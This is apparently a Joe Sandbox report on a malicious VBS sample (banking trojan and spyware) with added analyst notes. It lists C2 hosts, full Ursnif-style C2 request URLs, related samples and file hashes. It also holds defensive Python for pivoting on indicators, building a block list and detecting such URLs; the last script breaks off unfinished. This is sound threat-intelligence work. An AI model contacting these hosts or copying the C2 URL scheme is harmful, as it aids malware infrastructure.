                                                                                                                                  http://search.orange.co.uk/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.iask.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.tesco.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://cgi.search.biglobe.ne.jp/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown

Contacted IPs

Public

IP            Domain   Country        ASN    ASN Name                                            Malicious
47.241.19.44  unknown  United States  45102  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC    true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321161
Start date: 20.11.2020
Start time: 13:32:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 0k4Vu1eOEIhU.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winVBS@29/40@7/1
EGA Information:
• Successful, ratio: 50%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .vbs
Warnings:
• Excluded processes from analysis (whitelisted): audiodg.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
• TCP packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.43.139.144, 51.104.139.180, 104.42.151.234, 104.108.39.131, 23.210.248.85, 20.54.26.129, 205.185.216.42, 205.185.216.10, 51.103.5.159, 95.101.22.134, 95.101.22.125, 152.199.19.161
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net
• Execution Graph export aborted for target mshta.exe, PID 6112 because there are no executed functions
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time     | Type            | Description
13:33:29 | API Interceptor | 1x Sleep call for process: wscript.exe modified
13:34:04 | API Interceptor | 11x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match: 47.241.19.44
Associated Sample Name / URL | Detection | Context
earmarkavchd.dll | malicious | c56.lepini.at/jvassets/xI/t64.dat
6znkPyTAVN7V.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
a7APrVP2o2vA.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
03QKtPTOQpA1.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
2200.dll | malicious | c56.lepini.at/jvassets/xI/t64.dat
22.dll | malicious | api10.laptok.at/favicon.ico
mRT14x9OHyME.vbs | malicious | api10.laptok.at/favicon.ico
0RLNavifGxAL.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
1ImYNi1n8qsm.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
4N9Gt68V5bB5.vbs | malicious | api10.laptok.at/favicon.ico
34UO9lvsKWLW.vbs | malicious | api10.laptok.at/favicon.ico
csye1F5W042k.vbs | malicious | api10.laptok.at/favicon.ico
0cJWsqWE2WRJ.vbs | malicious | api10.laptok.at/favicon.ico
08dVB7v4wB6w.vbs | malicious | api10.laptok.at/favicon.ico
9EJxhyQLyzPG.vbs | malicious | api10.laptok.at/favicon.ico
http://c56.lepini.at | malicious | c56.lepini.at/
my_presentation_82772.vbs | malicious | api10.laptok.at/favicon.ico

Domains

Match: resolver1.opendns.com
Associated Sample Name / URL | Detection | Context
earmarkavchd.dll | malicious | 208.67.222.222
6znkPyTAVN7V.vbs | malicious | 208.67.222.222
a7APrVP2o2vA.vbs | malicious | 208.67.222.222
03QKtPTOQpA1.vbs | malicious | 208.67.222.222
fY9ZC2mGfd.exe | malicious | 208.67.222.222
H58f3VmSsk.exe | malicious | 208.67.222.222
2200.dll | malicious | 208.67.222.222
5faabcaa2fca6rar.dll | malicious | 208.67.222.222
0RLNavifGxAL.vbs | malicious | 208.67.222.222
1ImYNi1n8qsm.vbs | malicious | 208.67.222.222
YjimyNp5ma.exe | malicious | 208.67.222.222
0cJWsqWE2WRJ.vbs | malicious | 208.67.222.222
08dVB7v4wB6w.vbs | malicious | 208.67.222.222
9EJxhyQLyzPG.vbs | malicious | 208.67.222.222
u271020tar.dll | malicious | 208.67.222.222
Ne3oNxfdDc.dll | malicious | 208.67.222.222
5f7c48b110f15tiff_.dll | malicious | 208.67.222.222
u061020png.dll | malicious | 208.67.222.222
4.exe | malicious | 208.67.222.222
C4iOuBBkd5lq-beware-malware.vbs | malicious | 208.67.222.222

Match: api10.laptok.at
Associated Sample Name / URL | Detection | Context
earmarkavchd.dll | malicious | 47.241.19.44
6znkPyTAVN7V.vbs | malicious | 47.241.19.44
a7APrVP2o2vA.vbs | malicious | 47.241.19.44
03QKtPTOQpA1.vbs | malicious | 47.241.19.44
2200.dll | malicious | 47.241.19.44
22.dll | malicious | 47.241.19.44
mRT14x9OHyME.vbs | malicious | 47.241.19.44
0RLNavifGxAL.vbs | malicious | 47.241.19.44
1ImYNi1n8qsm.vbs | malicious | 47.241.19.44
4N9Gt68V5bB5.vbs | malicious | 47.241.19.44
34UO9lvsKWLW.vbs | malicious | 47.241.19.44
csye1F5W042k.vbs | malicious | 47.241.19.44
0cJWsqWE2WRJ.vbs | malicious | 47.241.19.44
08dVB7v4wB6w.vbs | malicious | 47.241.19.44
9EJxhyQLyzPG.vbs | malicious | 47.241.19.44
my_presentation_82772.vbs | malicious | 47.241.19.44
44kXLimbYMoR.vbs | malicious | 119.28.233.64
a.vbs | malicious | 8.208.101.13
7GeMKuMgYyUY.vbs | malicious | 8.208.101.13
A7heyTxyYqYM.vbs | malicious | 8.208.101.13

Match: c56.lepini.at
Associated Sample Name / URL | Detection | Context
earmarkavchd.dll | malicious | 47.241.19.44
6znkPyTAVN7V.vbs | malicious | 47.241.19.44
a7APrVP2o2vA.vbs | malicious | 47.241.19.44
03QKtPTOQpA1.vbs | malicious | 47.241.19.44
2200.dll | malicious | 47.241.19.44
0RLNavifGxAL.vbs | malicious | 47.241.19.44
1ImYNi1n8qsm.vbs | malicious | 47.241.19.44
http://c56.lepini.at | malicious | 47.241.19.44

Match: api3.lepini.at
Associated Sample Name / URL | Detection | Context
earmarkavchd.dll | malicious | 47.241.19.44
6znkPyTAVN7V.vbs | malicious | 47.241.19.44
a7APrVP2o2vA.vbs | malicious | 47.241.19.44
03QKtPTOQpA1.vbs | malicious | 47.241.19.44
2200.dll | malicious | 47.241.19.44
0RLNavifGxAL.vbs | malicious | 47.241.19.44
1ImYNi1n8qsm.vbs | malicious | 47.241.19.44
0cJWsqWE2WRJ.vbs | malicious | 47.241.19.44
08dVB7v4wB6w.vbs | malicious | 47.241.19.44
9EJxhyQLyzPG.vbs | malicious | 47.241.19.44
C4iOuBBkd5lq-beware-malware.vbs | malicious | 8.208.101.13
PtgzM1Gd04Up.vbs | malicious | 8.208.101.13
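The IP and Domain context tables above are what an analyst pivots on: every row says that another sample contacted the same indicator this sample did. The Python below is an added example written for this report, not Joe Sandbox code or an API it exposes. It embeds a constructed subset of the rows above as edges, pivots from this sample's own indicators to find related samples, and ranks them by how many distinct indicators they share. It also treats resolver1.opendns.com and 208.67.222.222 as low-specificity, since a public DNS resolver is shared with unrelated samples (the table above lists several .exe and .dll samples that only overlap there) and would pollute the pivot; the ASN is left out for the same reason. The allowlist and the helper names are assumptions of the example.

```python
"""Pivot on shared network indicators to find samples related to 0k4Vu1eOEIhU.vbs.

Hypothetical helper written for this report. The edges are a constructed
subset of the IP and Domain context tables on this page, not a Joe Sandbox API.
"""
from collections import defaultdict

# (indicator, sample) edges: one per row "sample X also contacted indicator Y".
# Constructed subset of the page's context tables.
CONTEXT_ROWS = [
    ("47.241.19.44", "earmarkavchd.dll"),
    ("47.241.19.44", "6znkPyTAVN7V.vbs"),
    ("47.241.19.44", "2200.dll"),
    ("47.241.19.44", "22.dll"),
    ("47.241.19.44", "my_presentation_82772.vbs"),
    ("api10.laptok.at", "earmarkavchd.dll"),
    ("api10.laptok.at", "22.dll"),
    ("api10.laptok.at", "my_presentation_82772.vbs"),
    ("api10.laptok.at", "a.vbs"),               # resolved to 8.208.101.13 there
    ("c56.lepini.at", "earmarkavchd.dll"),
    ("c56.lepini.at", "6znkPyTAVN7V.vbs"),
    ("c56.lepini.at", "2200.dll"),
    ("api3.lepini.at", "earmarkavchd.dll"),
    ("api3.lepini.at", "PtgzM1Gd04Up.vbs"),
    ("resolver1.opendns.com", "earmarkavchd.dll"),
    ("resolver1.opendns.com", "fY9ZC2mGfd.exe"),   # unrelated .exe samples that
    ("resolver1.opendns.com", "H58f3VmSsk.exe"),   # only overlap on the public
    ("resolver1.opendns.com", "4.exe"),            # resolver
]

# Indicators this sample contacted: the "Match" values of the tables above.
THIS_SAMPLE = "0k4Vu1eOEIhU.vbs"
THIS_SAMPLE_INDICATORS = {
    "47.241.19.44", "api10.laptok.at", "c56.lepini.at",
    "api3.lepini.at", "resolver1.opendns.com",
}

# Shared public services are not attacker infrastructure; pivoting on them
# drags in unrelated samples. Assumption: a small allowlist suffices here.
LOW_SPECIFICITY = {"resolver1.opendns.com", "208.67.222.222"}


def build_index(rows):
    """Index the bipartite sample<->indicator graph in both directions."""
    by_indicator = defaultdict(set)
    by_sample = defaultdict(set)
    for indicator, sample in rows:
        by_indicator[indicator].add(sample)
        by_sample[sample].add(indicator)
    return by_indicator, by_sample


def pivot(rows, seed_indicators, exclude=LOW_SPECIFICITY):
    """Return {sample: {shared indicators}} for each sample sharing at least one
    specific (non-excluded) indicator with the seed set."""
    by_indicator, _ = build_index(rows)
    related = defaultdict(set)
    for ind in seed_indicators - exclude:
        for sample in by_indicator.get(ind, ()):
            related[sample].add(ind)
    return dict(related)


def rank(related):
    """Samples sharing the most distinct indicators first, then by name."""
    return sorted(related.items(), key=lambda kv: (-len(kv[1]), kv[0]))


def blocklist(seed_indicators, exclude=LOW_SPECIFICITY):
    """Split the specific indicators into IPs and domains for blocking."""
    specific = seed_indicators - exclude
    ips = sorted(i for i in specific if i.replace(".", "").isdigit())
    domains = sorted(i for i in specific if i not in ips)
    return {"ips": ips, "domains": domains}


if __name__ == "__main__":
    print(f"Samples sharing infrastructure with {THIS_SAMPLE}:")
    for sample, shared in rank(pivot(CONTEXT_ROWS, THIS_SAMPLE_INDICATORS)):
        print(f"  {sample:28} {len(shared)} shared: {', '.join(sorted(shared))}")
    print(blocklist(THIS_SAMPLE_INDICATORS))
```

With the exclusion in place, earmarkavchd.dll ranks first (it shares all four specific indicators) and the .exe samples that only overlap on resolver1.opendns.com are not reported; passing exclude=set() pulls them back in, which is exactly the noise the allowlist is there to remove.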

ASN

Match: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Associated Sample Name / URL | Detection | Context
https://bit.ly/35MTO80 | malicious | 8.208.98.199
videorepair_setup_full6715.exe | malicious | 47.91.67.36
http://banchio.com/common/imgbrowser/update/index.php | malicious | 47.241.0.4
earmarkavchd.dll | malicious | 47.241.19.44
6znkPyTAVN7V.vbs | malicious | 47.241.19.44
a7APrVP2o2vA.vbs | malicious | 47.241.19.44
03QKtPTOQpA1.vbs | malicious | 47.241.19.44
1119_673423.doc | malicious | 8.208.13.158
1118_8732615.doc | malicious | 8.208.13.158
https://bit.ly/36uHc4k | malicious | 8.208.98.199
https://bit.ly/2UkQfiI | malicious | 8.208.98.199
WeTransfer File for info@nanniottavio.it .html | malicious | 47.254.218.25
https://bit.ly/2K1UcH2 | malicious | 8.208.98.199
http://sistaqui.com/wp-content/activatedg.php?utm_source=google&utm_medium=adwords&utm_campaign=dvid | malicious | 47.254.170.17
https://bit.ly/32NFFFf | malicious | 8.208.98.199
https://docs.google.com/document/d/e/2PACX-1vTXjxu9U09_RHRx1i-oO2TYLCb5Uztf2wHiVVFFHq8srDJ1oKiEfPRIO7_slB-VnNS_T_Q-hOHFxFWL/pub | malicious | 47.88.17.4
https://bit.ly/2Itre2m | malicious | 8.208.98.199
4xb4vy5e15.exe | malicious |
                                                                                                                                    • 47.89.39.18
                                                                                                                                    SVfO6yGJ41.exeGet hashmaliciousBrowse
                                                                                                                                    • 8.208.99.216
                                                                                                                                    TJJflelDEn.exeGet hashmaliciousBrowse
                                                                                                                                    • 47.52.205.194

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Temp\earmark.avchd | 6znkPyTAVN7V.vbs | | malicious | |
C:\Users\user\AppData\Local\Temp\earmark.avchd | a7APrVP2o2vA.vbs | | malicious | |
C:\Users\user\AppData\Local\Temp\earmark.avchd | 03QKtPTOQpA1.vbs | | malicious | |

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0F633127-2B78-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 70760
Entropy (8bit): 2.034359629023354
Encrypted: false
SSDEEP: 192:rBZGZj2N9W2tCfvlM3ZltmsrtVesIZFOsStO6p5cZ:rHiaNUWgupvPJFYtq1yZ
MD5: 76BAE3760A7E056624D0226120260C2F
SHA1: A5C8EFD8CB9D6EA583610C43A98D9337B7F2125F
SHA-256: 17BD2E6B3AE918E8E8248EB57E670C4E57966740BC8C35C48F33B0A830ADD024
SHA-512: DCEF7E2E75241023DCDBA7BB4E43527E074B7653AC02787D2A5C6531821F11C44D3D7557813EB0B38F88E4623621AF6D14AE628A2A15D3AD58DCFC6B62027081
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Note: the "Microsoft Word Document" type reported for this and the three following .dat files comes from the OLE compound-file container they share with Office documents (the "Root Entry" storage name is visible in the preview). They are Internet Explorer tab-recovery stores written by iexplore.exe, not documents, and the report does not flag them as malicious.

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0F633129-2B78-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 28164
Entropy (8bit): 1.9268944001243777
Encrypted: false
SSDEEP: 192:rnZcQE6SksFjN2YkWMMjYVsJxqVPGJlWA:rZ1vLshEcJj8sKODB
MD5: 862B7EA69B6D0472FA8AC833892C494F
SHA1: BC77F91784DF7C902CF5B1F47C83E9B6407C41D7
SHA-256: 7B47C605246AEAA8928460C4A5AE4FC6924C5FFD12083ED5D09EDB4F421009CE
SHA-512: D997B1AFC7DD0E32818BE0EE26EDC2B7CD46021F3FEA3248B54DCBD0B64D0BDA2BFA8F869971018DCE9E85B4EDDE0C4F7ABE4C904689BDBC192F69D5CE240858
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0F63312B-2B78-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 27584
Entropy (8bit): 1.9127183806686003
Encrypted: false
SSDEEP: 192:rOZNQ96OkvFjV2LkWSMxYpHcScVHcSQcVYA:raSovvhMvDxgHcxHclcB
MD5: 011F642808F0AFE4656C9EC945CECFBB
SHA1: C9A9DA74AE4CDDF937A1FF1E5A69805B15D05328
SHA-256: 531310E8D6CA03BB5A55B8C01CA850270E4FB65B78A058AD392E823ED7FB6A19
SHA-512: A2D1EAF779C5D76C8AE5BD52833668C5187392B084BB664A270DA44301AD46BD2CC0C1FC26CEF887AA104A08B5A8F904722D3798C12250DFFB9E18FF4B642294
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{15B14822-2B78-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 28148
Entropy (8bit): 1.9214715653777685
Encrypted: false
SSDEEP: 96:rlZ5Qt6zBSyFjF2wkW6MtYFxTPd16kGGA:rlZ5Qt6zkyFjF2wkW6MtYFxTPd16kGGA
MD5: 0F1719714B71D9E167C790D229798FAC
SHA1: 33D7F8D29EA172B80DE47E6792ABCB9E598C9ABE
SHA-256: 9F7F953C5DB32E5FE56E1ED786CBE77BDAC9DAEF39F1D1C87F1C57F638109C80
SHA-512: 6234991E77AAF4FCB7F2DB87ABCA87B57651E2DD1036782D3713A09589F6FC7F967110D2C041F5DD9C2C98AD83C594C102728E3F9B64C702AFB74F239D7099D5
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ghuK[1].htm
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: downloaded
Size (bytes): 2408
Entropy (8bit): 5.984213394225501
Encrypted: false
SSDEEP: 48:OurJo1eykcgE0yDBKjVqAW1iuR6RVWuYRJb77okJIfWo:nKzkyvGPW13R6vYRNsfz
MD5: 99911885EF8527B9BB520959D0400D23
SHA1: A214A86649EBA314D4BF4C1ED2AC48CAC7EEBA1B
SHA-256: 6A56806C098AA9CD6ADFD325BE3E9A05FDA817BD175A469A5027339EEA4C9058
SHA-512: 58A1F7252A01A5EEC8375316FB178361DC6A7D1AA6275370B760D15376EB47DE50901CD5F024AB6B738EB22FC0447D249126F76ABA3B2EBF81F4E2BE3CB96F8E
Malicious: false
IE Cache URL: http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK
Preview: dc5Myj1zX7wL16anUxKQbz0PUOVZccb3OWc2KaU5+XF1MrQFi5BV7tYx7BVtZTNjiJ4fPn/SH+6LpMOl9zy0PHDvdc1lteTU0DMsO0xKrJ2AJBhibqs0KAZjyZ2sATERlhsdm7/JrNq5iWPBI026FWqTzpw/E+iy/D1HCAxeakEUXanAlqIYdJVX2tjtziBfVxf9HFOuD0gXtSQqptUTh1GuewVWXfg7K1l6qMZXohnzDheZ+hO4JWUdY1G6C5TU7nGN1CzHxAx9rzc+7dBrMEHMrX/hFNwnZC5YRnKDiiWkzqW3qNWXXU23dnvOno54EE6JnFwpj3a75ko3/blADxve+zDiEAqDbvVLJAn2SEEybIqQG+c1hUe4DM7q6dY6wTRaJ9+kr2Faq0KjxDpfAaz/J7eRc3F86mOUUfhhZ+qch//Zv9OEuUbEummoMGReikRWVckbemdwmEzVgNSCiHpCY3r0L/rCWu6Rnoxa8M/zPljyUBPcWXjFVJDxpOW7G6k/iaI8TEQDYJr+iDAWzmmCN1N89rVDh9xrDVNPNlpuifS7S1ByEqoMfoEpCnxManZ/5CmJes5lxUz1ksnZjPSTpcoVJcIBDP2Svyfq3smofUMt0BsVHGKDs7O9RKHta7HHWZ4cy8oiqh69Mh9d3WUcD6OzCzR2xgtGXLn3ik618P0/CZ/HozGsVwB671/tTlbLqnV9XUTaHtLmc57EPDB54VvJLM53YU0P7IceRAZiPfZ+Ad1GdKGoj2BmcRcuqjA6EQIDA3sy2AePwSr0wNqED9SRm/RvuyUvhoCrFizu/NKJG4ekC5vWFWOFo+X11EG3tLHladPjLUNDLRWz/Ii/89l0UFGTmkyHLIAw1wAOYZgkAohqmgmpEzhEgot2hGSg1MOhC+gnykRezoR7/P6726Zap1bjfYtnPJ7Wy6vUMKKhKYivcP/raiyymBY/h0MP2y3w+mCTOwMpD8D8v+6KHVOL4iD8miJtfC+m
Note: this and the two following INetCache entries are bodies returned by api10.laptok.at to iexplore.exe. The request paths (several hundred characters of pseudo-random segments containing "_2B", "_2F" and "_0A" tokens) match the URI shape used by Ursnif for C2 requests, and the preview is opaque base64-looking data rather than HTML. "Malicious: false" is the verdict on that file content only; the host and URL pattern are the usable indicators.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\F2uVhvn9[1].htm
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: downloaded
Size (bytes): 338008
Entropy (8bit): 5.999869391852298
Encrypted: false
SSDEEP: 6144:X36/dI+cmFqVRwgq2o/JG/IRKIyyCmZm/hKC2Ny5vWb1OB/sQx2IKtA4QMO:a/dINmGREBXE3mUIC2nXc2IKW4Qp
MD5: 03D61BB1F49164FA9812A5E896C67F3E
SHA1: 85FA697A67481A5631B61FB3F539B4503B929EA1
SHA-256: CDE50C5D8FC8B941FD19E1F70B357635061FBFE6F9A0D5BD4C0CFD9F46BF8436
SHA-512: 04E6947E4C892007BD46F9FAA52D9B792892A929AFDCD2797091F54EC65D2822366F0A0743EB20B9E1497B08E164F5DB194010186D31B65831CB9C839A71C784
Malicious: false
IE Cache URL: http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\x[1].htm
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: downloaded
Size (bytes): 267700
Entropy (8bit): 5.999836336819629
Encrypted: false
SSDEEP: 6144:LO9BcSK5cnihVRakwHDgwodbX+Un+IQ7fqjeMRmd1:LkLn8VRl1woVX+2RQrtBd1
MD5: FC226C805B21348897F9CF750630EBA6
SHA1: 5F20971E026402B862B9A62A6B4CCCE997BFE90E
SHA-256: B2BA15FFD15238328B301C92BC4CB4CA7C5B500826146DBFACB98B261E12FB31
SHA-512: CC7D68BC7D29F45BBC9152AA9D360263B8F56675ED71C273C7750D9B268DF99A72C0B8CC2F0D2A1881784750D05CA8ABA9C5DA52393BA9AE27A2338F6EB13E2C
Malicious: false
IE Cache URL: http://api10.laptok.at/api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x
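The three IE Cache URLs above share a shape that a proxy-log sweep can pick out without any knowledge of the encrypted payload: a very long path made of pseudo-random alphanumeric segments, and "_2B" / "_2F" / "_0A" tokens standing in for the base64 characters "+", "/" and "=". The script below is an added example written for this page, not code from the sandbox report or from Joe Security: it scores URLs on those features and strips the inserted slashes back out. The token mapping is taken from public Ursnif/ISFB write-ups and is an assumption the report itself does not state (the "_0D" token that also appears above is left alone); the thresholds, the benign contrast URL and the treatment of the first path segment as a fixed prefix are likewise assumptions. Nothing here decrypts the recovered base64, which is still RC4 ciphertext under a key the report does not contain.

```python
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Token substitutions that public Ursnif/ISFB analyses describe for the
# base64-encoded (RC4-encrypted) request data before random slashes are
# inserted into the URI path. This mapping is an assumption; the report does
# not document it, and the "_0D" token also visible in the report's URLs is
# deliberately left untouched.
TOKEN_SUBSTITUTIONS = (("_2B", "+"), ("_2F", "/"), ("_0A", "="))

# Real "IE Cache URL" values taken from the report above.
REPORT_URLS = [
    "http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK",
    "http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9",
    "http://api10.laptok.at/api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x",
]
# Constructed benign URL for contrast (not from the report).
BENIGN_URL = "https://example.com/wp-content/uploads/2020/11/report.pdf"

# A path segment is "opaque" when it is only letters, digits and underscores:
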